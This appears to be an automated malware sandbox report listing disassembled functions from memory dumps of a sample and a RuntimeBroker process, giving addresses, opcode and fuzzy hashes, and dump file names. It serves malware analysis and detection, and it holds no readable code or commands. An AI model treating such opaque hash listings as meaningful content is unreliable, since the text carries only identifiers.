                                                                      • Opcode ID: 1783e4cc5d1e4f90ba53878fe1e63f08d1763f20384ae222ce7c6550a096ffa8
                                                                      • Instruction ID: adb560eedcb18063840adb1163eecc38a7e8f1877b62132c46f5a93d7f9c7103
                                                                      • Opcode Fuzzy Hash: 1783e4cc5d1e4f90ba53878fe1e63f08d1763f20384ae222ce7c6550a096ffa8
                                                                      • Instruction Fuzzy Hash: DF31A231A0D64E9FDF45EBA8C8699B97BF1FF69300B0505BAC009D72A2DE28A941C740
                                                                      Function 00007FFD9B890C25 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction ID: 26b371ae5d22925d681d1fefb9f09113c9bfb7e649d808597faecbeb96354945
                                                                      • Opcode Fuzzy Hash: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction Fuzzy Hash: 25213736B1E25D8FEB26A7A8AC250DC7F60EF45328F0541F3D058CB1D3D92826469781
                                                                      Function 00007FFD9B891B9F Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction ID: fec1a2d292ebe15e690a27d3c8d3668cf4e45f7402c3822f2dd18102452d4b2a
                                                                      • Opcode Fuzzy Hash: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction Fuzzy Hash: A7214721F1E90E9BEFB4F76884646B866D2EF8C711F5601B5D01ED72F2ED28AE418740
                                                                      Function 00007FFD9B890F90 Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8866cd75136ce16f54265ae019f1e9cd7afb61fc93d603092e72a42d64eb8780
                                                                      • Instruction ID: 3b8afd58605d9a50348222b8c645e225df77b3b4bee48b4c0f95a9bf607c180b
                                                                      • Opcode Fuzzy Hash: 8866cd75136ce16f54265ae019f1e9cd7afb61fc93d603092e72a42d64eb8780
                                                                      • Instruction Fuzzy Hash: F2217C74918AA98EE749EF18C4A97A53FE4F7A9319F00007FD04DD36D6CBB90065C744
                                                                      Function 00007FFD9B890C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction ID: f38a2b5c159d21b014f59bb00da816dd5ab370d8c3d035f9dbb82760c4bff89d
                                                                      • Opcode Fuzzy Hash: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction Fuzzy Hash: DF11E132E1E38D8FEB12DBA8886019C7FB0EF56714F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction ID: d1d94c76d1346f6878fd9981222ae4c27dafc7d87efef206e9d1eafee5ef111e
                                                                      • Opcode Fuzzy Hash: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction Fuzzy Hash: 7701C031E1E38D8FEB12DBA8886009C7FB0EF06704F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C50 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction ID: 32864386d666a27ddef3aa2b539f6f99fe1b8e43b80e78dd5bcfff2e813d6909
                                                                      • Opcode Fuzzy Hash: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction Fuzzy Hash: B9019E31E1E38D8EEB22DBA8886409C7FB0AF1A704F1541F7D054CB2A2D93866448740
                                                                      Function 00007FFD9B891C2D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: 81e4882dc4778f48362ee329f6f9474d6999b61f6d868f8e80d67a8a0dd082ef
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: 9BF03134F5E41F9AEFB4A754C8647B87762FF98711F5542B9C00DA31A1DE386A818B40
                                                                      Function 00007FFD9B890B77 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction ID: a4f239b09f9e580014013dd1df75325c70794e5468312655f167317a617412ae
                                                                      • Opcode Fuzzy Hash: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction Fuzzy Hash: 29F0E53571EA59CFC741AB38DC999D47F60EB47215BAA14FAC08AC7962C220586ECB44
                                                                      Function 00007FFD9B891CDA Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: eb05ac72acd36fa1e355f1a98ee1d01b38a027b0277aca0ca464e1afbb3de9f5
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: 67F03A21F1E40E9AEFB0E798C8642B83753AF88B11F5642B5C00DA32F1DD28AA428640
                                                                      Function 00007FFD9B8942E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e8a7a9896dcde40cb18d8cd3bf93014f0d7c5352b63b8c7bbd8f0ba3285dd3a
                                                                      • Instruction ID: a065091ff22b6501f40dca0421dd51a6e37875e5a9e3de8f6d2e64d2b4665500
                                                                      • Opcode Fuzzy Hash: 3e8a7a9896dcde40cb18d8cd3bf93014f0d7c5352b63b8c7bbd8f0ba3285dd3a
                                                                      • Instruction Fuzzy Hash: 59F02230518A1C8FCF98DB48C495EE9B7F1FB68305F154199914AE7260CB31AA80CF85
                                                                      Function 00007FFD9B892AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 9f57dabdae326f99f93587561800b524ac45c405cfcda306ebea8823e06024e6
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 35E01271F0D11A56FFA4A794D8617F966A0DB58300F1110B8D50ED33D1CD38AF418645
                                                                      Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction ID: a1592d64f44aef6646087a3d6f4792349c7178ea0843b085b4c9772da485db98
                                                                      • Opcode Fuzzy Hash: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction Fuzzy Hash: 45C04C06F6B61F01FC3677EF98660ACA9405FDDE10FD70172D54D400E19D4D22D54156
                                                                      Function 00007FFD9B891310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 45700d14890448792f7a77ee4ad80256f46f31d6e75c6f2da8f924a925832783
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F4C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7271E669DDD6C741
                                                                      Function 00007FFD9B894E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 76bd946553c2ef4ebd4a948394b85e23847e7e7cada1b332635ab29511e26127
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: 61C08CA1E2C20A95EB2496A048291AAB7818F09220F52867280ADA60A5DE2856025280
                                                                      Function 00007FFD9B892555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 942ae209e2e80192d2633539b94848fafb873516704abb15dcc6d6c989ff633b
                                                                      • Instruction ID: 92901dfa8d2df6fbca080bd6a1f0b68fd094f14cc0f385c49b54a05097a6c1c7
                                                                      • Opcode Fuzzy Hash: 942ae209e2e80192d2633539b94848fafb873516704abb15dcc6d6c989ff633b
                                                                      • Instruction Fuzzy Hash: D7C04C04F1881E56F75A6614543157E48929B44754F9545B4E41DD76CECE1C591202C7
                                                                      Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: b3f92d2a2f5a77ba122d8cd4cd5a1a83409582608cc8b965e381d36b81ceda09
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: 0FB01200E6740F00EC2433FB08520A478405B4C500FC20070D80E40091984D22940242

                                                                      Non-executed Functions

                                                                      Function 00007FFD9BC34748 Relevance: .5, Instructions: 496COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1765259253.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc30000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0eb4405634ad8345cd90f8be61f5aef0d3857e79e017d148ec6cd51fb7de7bbb
                                                                      • Instruction ID: cf1eec0d5c486129e1a65d791452822c73c2e681cfc1a03d1388043e3461c488
                                                                      • Opcode Fuzzy Hash: 0eb4405634ad8345cd90f8be61f5aef0d3857e79e017d148ec6cd51fb7de7bbb
                                                                      • Instruction Fuzzy Hash: B5F1A531F0995D5FEBA8FBA894B56BC62D2FFA8300F55017DE00DC32E6DE2869418741
                                                                      Function 00007FFD9BC31FA8 Relevance: .2, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1765259253.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc30000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bb7fc3d41ed1ad8fe9f363a73a03d203210ca8b3dea78bae87d27b1228b7b35e
                                                                      • Instruction ID: bebd020e80ff3c8126c25bf99f54f3f7a31320dde6ed20a48d855afed098c4a5
                                                                      • Opcode Fuzzy Hash: bb7fc3d41ed1ad8fe9f363a73a03d203210ca8b3dea78bae87d27b1228b7b35e
                                                                      • Instruction Fuzzy Hash: 53617E70A195198FEB58EFA8C8A5ABD73B2FF58304F910539D01ADB2A5CF34A941CB40
                                                                      Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 3886735fd86603637beb1b278350b42675a724268466b44f48847f05933f573d
                                                                      • Instruction ID: bf052793a3fd37f1244b75bb33fdb5bc94ce87890e76dd1f5b135db772e01080
                                                                      • Opcode Fuzzy Hash: 3886735fd86603637beb1b278350b42675a724268466b44f48847f05933f573d
                                                                      • Instruction Fuzzy Hash: 1D41D183B1853685E31F33FC79299ED5B84CF8527DB0842B7E16E8A0C76C88208392E5

                                                                      Executed Functions

                                                                      Function 00007FFD9B8A09AE Relevance: 1.2, Instructions: 1205COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0a71acaa448d106a6865c803d2a958cf9b7cbe63980d82ff9dc522d0ddc732a
                                                                      • Instruction ID: f0a284d3ac0c7a3b67b5cb09c90aa9642c6cd130a1e42c444ccefd6403ce4172
                                                                      • Opcode Fuzzy Hash: b0a71acaa448d106a6865c803d2a958cf9b7cbe63980d82ff9dc522d0ddc732a
                                                                      • Instruction Fuzzy Hash: FB82D321B1995E4FEBA8FB6884A5BB477D2FFA8300F1541B9D01DC32D6DD28BD828741
                                                                      Function 00007FFD9B8C1000 Relevance: .4, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2963a5d2afe7b139efd4a4f642526bca8c363727c8c9b920f1694eba472fdbd2
                                                                      • Instruction ID: 68e2b960691576704317e78d94fc711694e742f520f1d9f0d5f15f67c107ceda
                                                                      • Opcode Fuzzy Hash: 2963a5d2afe7b139efd4a4f642526bca8c363727c8c9b920f1694eba472fdbd2
                                                                      • Instruction Fuzzy Hash: BDB1DD61B2D69A0BE32DAB6C4CD20B473C1EB9A309B55877EC8DBC3457D92CE50782C1
                                                                      Function 00007FFD9B890B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9
                                                                      • API String ID: 0-3426396564
                                                                      • Opcode ID: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction ID: 68ecfc92bb65c7e1269d229fedc20664105a2c118639b07c7c8855f942d9a511
                                                                      • Opcode Fuzzy Hash: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction Fuzzy Hash: C201442772EA6A8FC6016B7DFC506E8BB50EBC613679600FBC245CB5A2E110186FC7D0
                                                                      Function 00007FFD9B890940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: eM_H
                                                                      • API String ID: 0-282742407
                                                                      • Opcode ID: 4f1fe7c759f8d36ae8929a40ebaf05fbf5714a32539b119869067d5f4d1c7008
                                                                      • Instruction ID: 2fcd46ec996ab82edff7d0ce4f0f37dba76b14050349198ebaba1ef2bc13e709
                                                                      • Opcode Fuzzy Hash: 4f1fe7c759f8d36ae8929a40ebaf05fbf5714a32539b119869067d5f4d1c7008
                                                                      • Instruction Fuzzy Hash: D0511631B0CB084FE758DB5CA85A67577D1EB99720F14417EF48EC32A2DA35BC428782
                                                                      Function 00007FFD9B8BA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: ebe96405d0b4b11926bf1887cdb92ebaf3cd62a93d0602a52305c7d25b0faa3b
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 60116031A1CB688FDB64DF18C40526AB7E1FB98711F16053ED489E3261CB34B9018B83
                                                                      Function 00007FFD9B8C1B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction ID: bb7650356f7d5c5e58d64ea971e03f87f52e82c674cdeed2858ed7e798d392a4
                                                                      • Opcode Fuzzy Hash: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction Fuzzy Hash: 7D11BF6150F3C54FDB53A77488689A57FA0EF43611B0A81EFD0C5CF0B3DA69494ACB12
                                                                      Function 00007FFD9B8C1BE9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction ID: 825d34e207d7b75df8fe4d01d6d004ee6a95eeaccaf4bf0af877a17fb57c0459
                                                                      • Opcode Fuzzy Hash: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction Fuzzy Hash: 2FE06D2164E3C04FCB16EB3888688557FA0AE6720174A42EEC086CF1A3EA2D8889C711
                                                                      Function 00007FFD9B8CA039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction ID: d4c85a19c988f8ae481850d15cdfad4b3ea28baac6b7a44035ae6bb4b3e4069a
                                                                      • Opcode Fuzzy Hash: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction Fuzzy Hash: 86E06D6164E7C44FCB5AEB748869454BFA0EF6721174A42EFC045CF1A7EA2DC885C701
                                                                      Function 00007FFD9B8C2E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction ID: b4a49f4f1ef1186964d0937bb0e67b9b0c1f0695dcb6b0cfbb6661a39f40ff14
                                                                      • Opcode Fuzzy Hash: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction Fuzzy Hash: 04E06D6164E7C44FC71AEA788869854BFA0EF6721174A52EFC045CF1A7EA2D8889C701
                                                                      Function 00007FFD9B8B9359 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
